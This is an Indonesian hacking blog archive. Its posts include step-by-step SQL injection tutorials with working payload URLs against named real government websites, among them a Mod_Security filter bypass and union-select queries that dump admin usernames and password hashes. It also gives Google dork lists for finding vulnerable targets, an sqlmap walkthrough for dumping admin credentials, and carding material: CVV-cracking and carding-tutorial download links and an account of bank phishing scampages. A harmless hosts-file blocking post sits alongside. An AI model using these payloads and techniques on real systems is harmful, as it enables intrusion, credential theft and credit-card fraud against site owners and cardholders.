Kamis, 13 Agustus 2015

Blokir Situs dengan CMD

Oke kembali lagi setelah vakum gk nulis, Ok kali ini gw akan share tentang blokir situs menggunakan CMD ( Command Prompt ). Oke langsung cekidot
Untuk Blokir Situs Internet yang kita butuhkan adalah................. COMMAND PROMPT kita hanya membutuhkan COMMAND PROMPT untuk Memblokir Situs yang kita mau.

STEP BY STEP

1. Pertama : Untuk win 7 klik "START" lalu pilih All Program, lalu pilih Accessories, lalu "Klik Kanan" pada Icon Command Prompt, lalu Pilih "RUN AS ADMINISTRATOR" INGAT !!!! Harus di RUN AS ADMINISTRATOR . karena hanya admin yang bisa akses file folder system nya

2. Kedua : Kalo udah masuk CMD nya ketik script Perintah "cd drivers/etc" (tanpa tanda ") terus enter

3. Ketiga : ketik lagi perintah "edit hosts" (tanpa Tanda ") terus enter nanti muncul mode script layar biru yang berisi script perintah "LOCALHOST"

4. Setelah masuk mode script layar biru, akan ada script bertuliskan "127.0.0.1 localhost" TUGAS agan adalah..... Ketikkan angka 127.0.0.2 untuk alamat situs yang pertama yang ingin agan blokir, begitu juga selanjut nya ketik 127.0.0.3 dan seterus nya sampai beberapa situs yang ingin agan blokir.

5. : Setelah Masukin Angka-angka 127.0.0.... masukin alamat Situs yang mau agan blokir. Contoh : 127.0.0.2 www.youtube.com (www.youtube.com) 127.0.0.3 www.facebook.com (www.facebook.com) STEP

6. TERAKHIR : Setelah selesai masukin situs yang mau di blokir, arahkan kursor ke pojok kiri atas "FILE lalu Klik SAVE" Close Command Prompt lalu Restart Browser dan Lihat Hasilnya

Semoga bermanfaat :D
thanks buat kunjungannya, balik lagi ya

Minggu, 07 Juni 2015

Bypass Mod_Security SQLInjection

 
Demo : multan.gov.pk/files.php?id=1

  • Pertama seperti biasa cek web pulen atau tidak
                  multan.gov.pk/files.php?id=1' ==> Error

  • Kedua cari jumlah column

Berarti jumlah column ada 2

Selanjutnya

multan.gov.pk/files.php?id=-1+union+select+1,2--+

Nah hasilnya adalah

Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
nah terdapat tulisan "this error was generated by Mod_Security" jadi sebelum kita dapat menginjectnya maka harus membypass mod security tersebut

untuk membypass Mod_Security ganti tulisan union select dengan
/*!50000UNION*//*!50000SELECT*/

Jadi hasilnya adalah

multan.gov.pk/files.php?id=-1/*!50000UNION*//*!50000SELECT*/1,2--+

Dan akhirnya muncullah Angka Ajaib

Untuk selanjutnya hanya tinggal melakukan inject seperti sql injection manual biasa ^_^ so have funn

NB: Semua penyalahgunaa pada tutorial diatas bukan merupakan tangging jawab dari Penulis. Di tulis hanya sebagai pembelajaran tentang security semata, Dosa Tanggung sendiri

Selasa, 05 Mei 2015

Manual SQL Injection Tutorial


SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :

id=$id;……. > Got Error

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.

Contoh : http://situstarget.com/news.php?id=1’ http://situstarget.com/news.php?id=’1

Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :


inurl:azerty.php?id= , inurl:bouquin.php?id= , inurl:lien.php?id= , inurl:clavier.php?id= inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:games.php?id=inurl:iniziativa.php?in=inurl:curriculum.php?id=inurl:labels.php?id=inurl:story.php?id=inurl:look.php?ID=inurl:newsone.php?id=inurl:aboutbook.php?id=inurl:material.php?id=inurl:opinions.php?id=inurl:announce.php?id=
Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1




Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Errorhttp://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error


  http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error




Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--




nanti muncul sebuah angka tebal, nah Diangka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".contoh: http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.contoh :http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--



Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--



Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut

Sabtu, 21 Maret 2015

Cara Mengetahui Nomor Kode Rahasia CVV dari Kartu Kredit


CVC atau Card Verification Code Adalah tiga digit angka terakhir yang terdapat pada bagian belakang nomer kartu kredit. Tidak ada perbedaan berarti antara CVC dan CVV (Card Verification Value). CVC Adalah sebutan yang dipakai Master Card Sedang CVV digunakan oleh Visa. Penggunaan fitur keamaan ini dimulai pada 1 Januari 1997 Oleh Master Card dan diikuti oleh Visa pada tahun 2001. Namun baru pada bulan Oktober 2003, penggunaan CVV/CVC menjadi standar di seluruh pembayaran elektronik dan online. Dan CVC dan CVV berfungsi untuk melindungi penggunaan kartu kredit Anda oleh orang lain dalam transaksi online

Saya disini akan  memberkan sedikit cara untuk memecahkan CVV/CVC yang belum diketahui serta memberikan cara mengetahui Kartu Kredit masih Valid atau tidak Valid, tutorialnya bisa didownload dibawah ini.

http://adf.ly/1B0umO


Kamis, 19 Maret 2015

Deface Metode SQLmap OS windows


Sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.

Sebelum mulai membaca disini saya akan menjelaskan sedikit perintah CMD yang akan di gunakan pada tutorial kali ini :

1. -u   yaitu untuk menunjukkan URL target.
2. --dbs   yaitu untuk membuka DATABASE target.
3. --tables   yaitu untuk membuka TABEL pada DATA BASE target.
4. -D   yaitu penunjukkan pada DATA BASE target
5. --columns   yaitu untuk membuka COLUMNS pada TABEL data base
6. -T   yaitu penunjukkan pada TABEL data base
7. --dump   yaitu untuk membuka DATA pada COLUMN yang terdapat pada TABEL database.
8. -C   yaitu menunjukkan pada COLUMNS tabel

Bahan-Bahan :

1. python ( download sesuai bit windows kalian ) kalo saya versi 27
2. SQLmap ( banyak di google )
3. Command Prompt

Langkah-Langkah :
  • install python di drive C: dengan nama folder python27 ( ini default nya begini )
  • setelah terinstall, lalu extract Folder SQLmap ke dalam folder python27 tadi .. ( taruh di Drive C: folder python27 )
  • lalu buka command prompt, pasti udah taulah buka CMD gimana :v
  • untuk memanggil python nya .. anda harus berada dalam C:\ ketik perintah : 
    cd python27 (enter) 
  • setelah berada dalam C:\python27. Lalu tinggal memanggil SQLmapnya. tadikan kita taruh folder SQLmap nya di python27..
jadi perintahnya ketik :
cd sqlmap (enter)
maka akan begini C:\python27\sqlmap (berarti sukses,tinggal cari target pakai dork SQL)
  • disini kita anggap anda sudah punya TARGET yang Mysqlnya error ..
ketik perintah :

       sqlmap.py -u http://target.com/php?id=32 lalu enter! tunggu sampai selesai..
  • lalu setelah mendapat informasi dari target (terkoneksi dengan target) tinggal kita cari DATABASE nya..
ketik :

      sqlmap.py --dbs -u http://target.com/php?id=32 lalu enter!

tunggu hingga muncul data base nya. biasanya nama data base nya diatas tulisan information_schema
  • setelah itu setelah kita tau DATABASE nya tinggal kita lihat isi TABELnya
ketik perintah :

     sqlmap.py --tables -D (nama data base target) -u http://target.com/php?id=32

tunggu hingga selesai dan muncul TABELnya,
  • setelah anda tahu ada TABEL apa aja disitu, yang kita cari adalah ADMIN, atau USERADMIN dll. yang berhubungan admin. yang kita lakukan selanjutnya adalah mencari COLUMN pada tabel,
contoh disini TABEL yang kita ambil yaitu ADMIN .
ketik perintah :

   sqlmap.py --columns -T ADMIN -D (nama data base target) -u http://target.com/php?id=32

tunggu hingga muncul COLUMN pada TABEL ADMIN tadi..
  • setelah muncul COLUMN nya , misalkan disitu ada COLUMN , username dan password
selanjut nya kita DUMP COLUMN username dan password tersebut.
ketik perintah :

  sqlmap.py --dump -C username,password -T ADMIN -D (nama data base target) -u http://target.com/php?id=32

gunakan tanda KOMA tanpa SPASI untuk menyekatnya seperti diatas tadi kan :
username,password
  • maka akan muncul username dan password
kalo password nya belum di hash , kemudian hash password

sekian dan terima kasih.
maaf cuma segini yang aku bisa sampaikan.

NOTE : PENULISAN HARUS BENAR DAN SESUAI YANG ADA PADA COMMAND PROMPT

Rabu, 11 Maret 2015

Teknik Scampage Para Carder

Biasanya para carder mempunyai banyak ide untuk mendapatkan uang, dengan berbagai cara mereka lakukan salah satu nya teknik scampage.

Scampage adalah sebuah source yg berbasis html ato php yg berbasis web yang didesign khusus sehingga mirip aslinya seperti page pada bank Bank of America, Paypal dll, dan dengan mudah para carder membuat page tiruan yang mirip seperti bank.

Cara mereka melakukan teknik scampage yaitu dengan menyediakan webhosting untuk dipasang source phpmailer dan scampage tersebut yg mirip contoh "bank of america" dengan mengupload source ber extensi php.

Ada berbagai cara teknik dilakukan carder untuk mendapatkan webhosting. dengan membeli webhosting melalui carding, dan juga menggunakan hacked host. Para carder biasanya memiliki kemampuan hacking underground sehingga memungkinkan melancarkan aksinya karena dengan ilmu hacking yg mereka punya dapat mendukung dan mempercepat proses mendapatkan data data yang mereka inginkan.

Seperti biasanya para carder mencari suatu kelemahan bugs pada sebuah ****ite, setelah mereka mendapatkan akses di ****ite hasil hack tersebut, para carder memanfaatkan hosting web tersebut untuk menjadi tempat phpmailer yg gunanya melakukan spam ke email email korban.

Langkah Langkahnya
Langkah berikutnya setelah carder sukses mengupload/menempatkan file phpmailer yg disembunyikan diserver target hasil hacking, contoh To view links or images in this forum your post count must be 20 or greater. You currently have 0 posts. 1.php ada source/file phpmailer

Dengan memberi alamat email persis seperti target : Bank, PayPal dll
pada Bank contoh Bank of America, mereka biasanya menggunakan email mirip bank of america : To view links or images in this forum your post count must be 20 or greater. You currently have 0 posts. dan pada subject mereka menggunakan kata kata ato kepala surat yg mempengaruhi target seperti : Bank Of America Security, dan nama pengirim juga persis seperti bank of america <----

Pada isi surat ato badan email mereka merancang page tersebut seolah olah bahwa memang benar dari Bank of America tersebut sehingga membuat si target terkecoh. si target tidak tau bahwa dalam page tersebut terdapat link scampage si carder itu yg terpasang di hacked host carder tersebut. sehingga target mengklik link tersebut sehingga masuk halaman scampage carder yg diharuskan mengisi data target berupa full info dan creditcard beserta login password bank atopun paypal, dan otomatis data tersebut akan masuk ke email si carder.

Selasa, 10 Maret 2015

TEKNIK HACKING DENGAN CMD

Jangan keliru dengan judulnya :D , yang saya maksud di sini yaitu pemanfaatan cmd untuk membantu Hacker melakukan aksinya. Berikut beberapa perintah cmd yang sering digunakan oleh hacker:

1.       Ping
Perintah ping biasanya digunakan untuk mengetahui ip address target, atau bisa digunakan untuk mengecek apakah koneksi ke target berhasil atau tidak.
Untuk menjalankan ping, ketik aja “ping target”



2.       Ping –t
Perintah ini biasanya digunakan untuk melakukan DDOS ke target. Perintahnya “ping target –t”. Perintah ini memungkinkan kita mengirimkan paket secara terus menerus. Untuk menghentikannya, tekan CTRL+C.



3.       Tracert
Digunakan untuk mencari jalur/router yang dilewati paket yang dikirim ke target. Perintahnya “tracert target”


4.       Telnet
telnet berguna untuk masuk ke sistem, yang menjalankan service telnet. Untuk menggunakan telnet di windows kita harus menginstal dulu telnet client di windows. Untuk menggunakan telnet ketikkan “telnet target”

 

5.       FTP
Sama seperti Telnet, tapi FTP biasanya untuk upload dan download file, dll. FTP dan telnet server menjadi sasaran empuk jika pengamanannya lemah.

 

6.       Net View
Ketik net view kalo terkoneksi jaringan, nanti kelihatan siapa2 yang terkoneksi ke jaringan.

7.       Masih banyak lagi yang digunakan, untuk saat ini cukup itu dulu.


Tunggu Sampai Artikel Selanjutnya oke ;)

Tutorial Carding

Sebelumnya pasti sudah pada tahukan pengertian dari carding itu sendiri ? Bagi yang belum tahu saya akan sedikit memperjelas dan memberitahu terlebih dahulu pengertian atau definisi dari carding itu.



Apasih Carding itu? Carding adalah suatu kegiatan penyalahgunaan data pada kartu kredit online maupun kartu kredit online yang biasa dgunakan oleh carder (sang pelaku carding) yang sangat tak bertanggung jawab untuk berbelanja secara online dengan memakai kartu kredit yang dimiliki oleh orang lain dengan cara yang ilegal. Sebetulnya Cara melakukan carding lumayan mudah membuat teknik ini kerab ditemui di tahun 2001 hingga sekarang ini. Seseorang pelaku ini (pelaku carding/carder) tak memerlukan mencuri sebuah kartu kredit yang dimiliki orang lain tersebut untuk dipakai di dalam melakukan pembayaran di internet. Suatu pembayaran atau transaksi kartu kredit di internet hanya dilakukan dengan cara menginput suatu nomor kartu kredit beserta dengan password atau nomor rahasianya yang seringkali berasal dari 3 atau 4 digit di belakang kartu kredit tersebut. Sudah sangat jelas bahwasannya di Peraturan UU ITE Yang dibuat oleh keamanan cyber menyatakan bahwa tindakan mencuri dan merusak sangat dilarang dan akan dihukum sampai kepada hukuman pidana penjara. Akan tetapi masih saja ada oknum-oknum yang melakukan carding untuk mencari keuntungan sendiri, Di jejaring sosial sendiri juga sudah banyak para carder (Pelaku Carding) yang memperjualbelikan kartu kredit hasil cardingan tersebut. Sebaiknya anda jadikan tutorial dan cara yang saya berikan ini menjadi pelajaran semata dan bukan untuk dipraktekkan, Walau bagaimanapun tindakan carding ini sangat amat merugikan untuk si korban yang kartu kredit nya anda retas. Saya memberikan tutorial ini hanya untuk pembelajaran semata bukan untuk merusak, segala tindakan perusakan bukan tanggung jawab saya melainkan tanggung jawab diri anda sendiri.

Lebih lanjutnya download tutorial Carding Book For Newbie

http://adf.ly/19Xq89